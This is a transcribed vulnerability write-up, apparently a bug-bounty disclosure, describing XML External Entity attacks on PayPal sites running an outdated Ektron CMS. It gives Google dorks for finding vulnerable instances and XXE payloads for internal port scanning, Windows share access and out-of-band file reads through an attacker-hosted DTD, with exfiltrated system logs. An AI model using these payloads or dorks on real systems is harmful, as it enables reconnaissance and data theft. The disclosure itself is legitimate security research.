Paypal XXE Sean

Transcription

1 Paypal XXE Sean Introduction I was able to find three XML External Entity (XXE) attacks on PayPal s externally facing sites. The vulnerabilities are related to Ektron CMS which has been notorious for vulnerabilities. Paypal was running an older version of Ektron which left the web services exposed. Here s the write up! Exploit Google Dork to find some PayPal services running Ektron: inurl:robots.txt intext:disallow: /workarea/ site:*.paypal.* arch

2 Many of the web services require authentication, however the search functions do not! Surprisingly these are the functions that are using a vulnerable XML parser! By submitting the query parameter with a blank value I was presented with an error referencing LoadXml, which in the past has been vulnerable to XXE. I then submitted some XML to test if I could scan ports on their internal servers/networks. I was able to! Payload: query=<?xml version="1.0" encoding="iso "?><!doctype foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM " >]><foo>&xxe;</foo> Port 80 response shows there is a service listening: Port 22 response shows there is no service listening: Change the port number to whatever port you would like to scan or run it through intruder and do an automated port scan. Compare the response sizes and content to determine which ports have a service listening on them. Anything with a response size different from 2453 shows that there is a service listening.

3 This can be used to enumerate services listening internally that may be vulnerable to SQL injection or command execution via GET parameters in the URL. E.g. waitfor delay 00:00: This attack can also connect to Windows Shares. An attacker can scan the internal network and look for open shares containing sensitive documents. Payload: query=<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % file SYSTEM "\\localhost\admin$"> <!ENTITY % dtd SYSTEM " %dtd;]><roottag>&send;</roottag> I can also read local files off of the webserver using an out-of-band method by hosting an external DTD.

4 Payload: query=<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % file SYSTEM "file:///c:\windows\win.ini"> <!ENTITY % dtd SYSTEM " %dtd;]><roottag>&send;</roottag> External.dtd file that I am referencing from my server: The win.ini file outputted to my server logs: URL Decoded output: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files]

5 [Mail] MAPI=1 Some various log files found on windows systems that I was able to pull as well: C:\windows\security\logs\scecomp.old MACHINE\System\CurrentControlSet\Services\Tcpip Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCLCSWRPRC;;; NS)(A;CI;KR;;;LS)(A;CI;CCLCSWRPRC;;;NO)(A;CI;CCLCSWRPRC;;;S )(A;CIIO;RC;;;OW) MACHINE\System\CurrentControlSet\Services\Tcpip\ServiceProvider

6 MACHINE\System\CurrentControlSet\Control\Network Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI; KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;; S )(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S )(A;CIIO;RC;;;S-1-3-4) MACHINE\SYSTEM\ControlSet001\services\Tcpip\Linkage Security=D:PAI(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI; KA;;;NS)(A;CI;KA;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPSDRC;;; S )(A;CIIO;RC;;;OW)(A;CI;KA;;;SU)(A;CI;KA;;;S )(A;CIIO;RC;;;S-1-3-4) MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters Security=D:P(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;CCDCLCSWRP WPSDRC;;;NS)(A;CI;KR;;;LS)(A;CI;CCDCLCSWRPSDRC;;;NO)(A;CI;CCDCLCSWRPWPS DRC;;;S )(A;CIIO;RC;;;OW)(A;CI;KRKW;;;S ) MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY) MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Winsock Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY) MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G RLCSWCCRPRC;;;S )(A;CI;GR;;;LS)(A;CI;GR;;;NO) MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6 Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G RLCSWCCRPRC;;;S )(A;CI;GR;;;LS)(A;CI;GR;;;NO) MACHINE\SYSTEM\ControlSet001\services\Dhcp\Configurations Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G A;;;S )(A;CI;GR;;;LS)(A;CI;GA;;;NO) MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G A;;;S )(A;CI;GR;;;LS)(A;CI;GA;;;NO)

7 MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parametersv6\Options Security=D:P(A;CI;GR;;;BU)(A;CI;GA;;;BA)(A;CI;GA;;;SY)(A;CI;GR;;;NS)(A;CI;G A;;;S )(A;CI;GR;;;LS)(A;CI;GA;;;NO) C:\windows\security\logs\scesrv.log Wednesday, June 11, :54:02 AM ----Configuration engine was initialized successfully Reading Configuration Template info Configure User Rights... SeImpersonatePrivilege must be assigned to administrators. This setting is adjusted. SeImpersonatePrivilege must be assigned to SERVICE. This setting is adjusted. Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S Configure S

8 Configure S User Rights configuration was completed successfully. ----Un-initialize configuration engine... Conclusion The impact of this XXE is that a persistent attacker can find the location of sensitive files such as web.config and steal private information from PayPal. They can then use this information and other information retrieved from other configuration files to pivot to other services that PayPal uses to hold internal and customer data. Additional Info A number of domains vulnerable to this exploit are below:

9

10 Google Dorks to find other Ektron instances 1. inurl:/workarea/webservices/ 2. inurl:robots.txt intext:disallow: /workarea/ Resources